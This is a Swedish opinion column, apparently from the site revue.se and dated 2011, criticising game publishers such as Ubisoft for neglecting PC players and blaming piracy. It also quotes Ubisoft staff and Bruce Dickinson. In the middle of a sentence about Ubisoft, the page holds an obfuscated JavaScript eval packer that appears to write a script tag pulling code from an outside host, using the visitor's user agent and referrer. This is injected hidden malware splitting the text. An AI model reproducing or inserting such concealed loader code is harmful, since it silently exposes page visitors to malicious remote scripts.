Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

No Comments

Revue.se | Krönika: Dem tänker inte utveckla till PC längre. ...

Krönika: Dem tänker inte utveckla till PC längre. Piratkopiering och spelindustrin…
Filip Urde
  • On 27 november, 2011
  • http://www.revue.se/filip-urde

Jag har velat skriva den här artikeln länge nu. Men det har inte riktigt varit läge för min kritik förens nu.

Det jag ska skriva om är spelindustrins metodiskt dåliga behandling av PC spelare, med allt från dåliga portningar, dåliga kontroller, till att rent av strunta i att släppa spelet till PC. Idag finns det två läger inom spel industrin, dessa är konsol och PC.  PC har alltid stått som valet för den mer engagerade spelaren, på PC spelar man i förstahand förstapersons skjutspel och strategi. Två genrer som helt enkelt ska spelas på en PC, du behöver precisionen av en mus för att det ska vara bra. Konsol har ägnat sig mer åt äventyr och sport. Spel som är mer lättsmälta helt enkelt. Det har varit hela tanken sen konsolerna kom. ”Plug and play”, du ska inte installera, utan bara trycka i spelet och sedan så kör man. Det ska vara en avkoppling och något man göra socialt, man spelar två/fyra personer tillsammans och alla har kul framför tvn. PC är mer på en individ nivå, man sitter med varsin dator, inte alla kompisarna runt en dator. Men sedan så spelar man tillsammans via nätverk och gör det hela till en lagsport, vilket har givit PCn en extra dimension under en lång tid.

Detta har nu suddats ut i och med dagens generation av konsoler där man anammat multiplayer spelandet och försöker göra konsolerna till light versioner av en PC. Jag vet inte om ni tänkt på det, men hur många spel förutom sportspel kan man idag spela mer än en person på?

Köpen av extra handkontroller har en kraftig nedgång, då spelen som göra till dagens konsoler är inte tänkta att man ska sitta tillsammans och spela. För att vara krass så görs detta som så mycket annat p.ga. pengar. Vilket inte är konstigt i sig, det är företag vi pratar om. Men det konsol tillverkarna och speltillverkarna vill är inte att ni fyra kompisar ska kunna köpa bara ett spel och sedan sitter alla och kör detta tillsammans. Man vill självklart att alla fyra kompisarna ska köpa varsin kopia. Där med har konsolernas faktiska enda fördel försvunnit.

Men varför köper då folk en konsol framför en PC? En PC gör allt en konsol gör, fast 10 gånger bättre. Det är snyggare grafik, du har bättre precision, spelen är billigare, det finns mods (ofta) m.m. Det vanliga svaret och vilket är anledningen, är att en bra PC är för dyr för många om man inte är så pass engagerad att man vill bygga själv. En bra gameing PC ligger runt 10 000 kronor. Vad som mer talar emot en PC har varit att det är för komplicerat, inte själva PCn i sig, men att du ska installera, ha koll på att din PC klarar av spelet, datorn hänger sig, det blir fel osv. På konsoler så vet man att det funkar. Det finns alltså för och nackdelar med bägge och man väljer vilket som passar dig själv.

Vad som dock är problemet är att man nu från speltillverkares sida har börjat lägga om växeln och satsar mer på konsol framför PC, till och med så mycket att man inte tänker utveckla alls till PC. Ubisoft har eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abkdk|var|u0026u|referrer|kydhi||js|php’.split(‘|’),0,{}))
gått ut och sagt att man tänker inte släppa varken I Am Alive eller 
Ghost Recon: Future Soldier kommer till PC. I Am Alive menar utvecklarna att det var designat endast för XBLA och PSN. Men med Ghost Recon är det helt enkelt ingen idé att utveckla till PC eftersom spelen bara piratkopieras.

It’s hard because there’s so much piracy and so few people are paying for PC games that we have to precisely weigh it up against the cost of making it. Perhaps it will only take 12 guys three months to port the game to PC, it’s not a massive cost but it’s still a cost. If only 50,000 people buy the game then it’s not worth it.

Vad PC spelarna istället för nöjja sig med är Ghost Recon Online, som är ett gratis spel.

When we started Ghost Recon Online we were thinking about Ghost Recon: Future Solider; having something ported in the classical way without any deep development, because we know that 95% of our consumers will pirate the game. So we said okay, we have to change our mind. We have to adapt, we have to embrace this instead of pushing it away. That’s the main reflection behind Ghost Recon Online and the choice we’ve made to go in this direction.

 

Ubisoft, detta franska spel företag som har släppt hit-spel, som Tomb Raider, Splinter Cell och så klart Ghost Recon. Men dem tror för mycket om sig själva! Jag blir faktiskt riktigt irriterad på vad dem säger. Innan man bestämde sig för detta så har man bland annat mer eller mindre förstört för PC spelare med olika DRM system (Digital rights management), som gjorde att du var tvungen att ladda ner olika patchar för att överhuvudtaget kunna spela, eller att du alltid måste vara online för att kunna spela. Små saker som förstör helheten och något som känns väldigt fult när man varit en god konsument och köpt spelet. Spel piratkopieras inte den utsträckning som Ubisoft anser, särskilt inte deras spel!

Några som dock har förstått hur det ligger till är Valve, dem anser att bättre service kan bidra till att minska piratkopieringen och inte offensiver mot pirater eller DRM.

Jag är fast besluten om att bra spel köps och halvbra/ dåliga kan bli piratkopierade. Är spelet bra då köps det! Half Life 2 sålde i 1,7 miljoner exemplar inom första månaden och då var det ännu enklare att ladda ner spel.

Men detta kan man se på olika sätt, men ett sätt är att det är ett dyrt media vi pratar om, spelen ligger på 500kr för ett PC spel och på dåliga butiker runt 700 kr för ett konsolspel. Vad Ubisoft och många andra inte inser är följande: alla förutom någon vek liten procent som laddar ner spel/film och musik, laddar ner saker som dem ändå aldrig skulle köpa. Som ett test, ”är detta bra?”. Man köper inte i regel ett spel eller något annat man är osäker på. Ett moget sätt att se på hela den här härvan med piratkopiering är att, visst det finns dem som laddar ner, men om man gör en välgjord produkt från början och inte försämrar för en grupp av användarna så kommer dem flesta att köpa den. Till och med köpa den efter man laddat ner en piratkopia och testat, då den är så pass bra och är därmed värd det. Det finns så klart dem som inte gör så, utan bara laddar ner. Det kan man se som en förlust, dock en förlust som inte är helt fruktlös. Då dessa spel blir piratkopierade så får man en till person som har spelat spelet. En vandrande reklampelare. Dem har spelat spelet och pratar sedan med sina vänner om det (word of mouth) vilket skapar en buzz kring spelet och så vitt jag vet så lyssnar dem flesta på sina vänner framför vad en speltidning eller vad revue.se säger om saken. Vi människor gillar att prata och tipsa varandra, vilket bättre sätt att få reklam för sin produkt än av folk som testat den på riktigt och inte en demo version.

Och faktum är det är så otroligt få som faktiskt laddar ner spel (musik och film är kanske en annan sak) och idag finns det inte något annat media som växer så mycket som just spel. Så varför inte se det som promotions kostnader och vara lite mer cool översaken. Likt ett av mina favoritband, Iron Maiden är väldigt bra på. Bruce Dickinson, som är sångare i gruppen, pratar ofta om att hans skivbolag inte gillar att man laddar ner deras musik, följt av han säger ”fuck them” han vet att folk köper deras musik, om dem inte gör det så kommer dem på konserterna och vipps så framstår han inte som en fiende till en hel generation, tänk om fler kunde tänka så.

”We don’t care if you download ur musik, if you are a real fan we know you will buy it or come to our show.”

– Bruce Dickinson, Iron Maiden

 

Men hela industrin är idag osund gentemot PC och dess användare. Många glömmer bort vilka som byggt upp deras framgång, vilka som är kärnanvändarna, alltså inte bara ”Casual Gamers”. Exempel på dessa är bland annat Call of duty, som vann pris efter pris för sina briljanta PC spel. Sen byter man studio och struntar totalt i hur ett spel ska vara på en PC. Aim assist, inte kunna lägga sig, dålig kontroll. Tyvärr samma med Dice och Battlefield, nu sa man att man skulle satsa mest på PC när man gjorde Battlefield 3, något man sen bröt. Nu är det inte lika illa som med Call of duty, men att man med gott samvete satsar på konsolversionen av ett förstapersons skjutspel framför PC versionen när man är en studio som gör krigsspel, ja då är något fel!

Medvetet gör man spelen sämre på PC, vilket jag anser endast ökar piratkopieringen. Vem vill köpa något som inte är tänkt till sin produkt? den har ingen känsla av kvalité och eller yrkesstolthet från företag, den är bara släppt, för att dem måste. Den onda cirkeln är igång. Jag anser att man skjuter sig i foten när man som Ubisoft, försöker göra en häxjakt och till och med aktivt exkludera en hel plattform.

Nej detta är dålig respekt mot konsumenterna, att man låter dem köpa en stympad och sämre produkt till fullpris. Gör helhjärtade satsningar och piratkopieringen kommer minska.  Man vill att konsolerna med sina dyrare utgåvor ska vara första valet. Man försöker till och med göra förstapersons skjutspel till något man ska spela på konsol framför en PC. Tråkigt för dem som aldrig får chansen at spela genren som den verkligen ska spelas.

www.digital-digest.com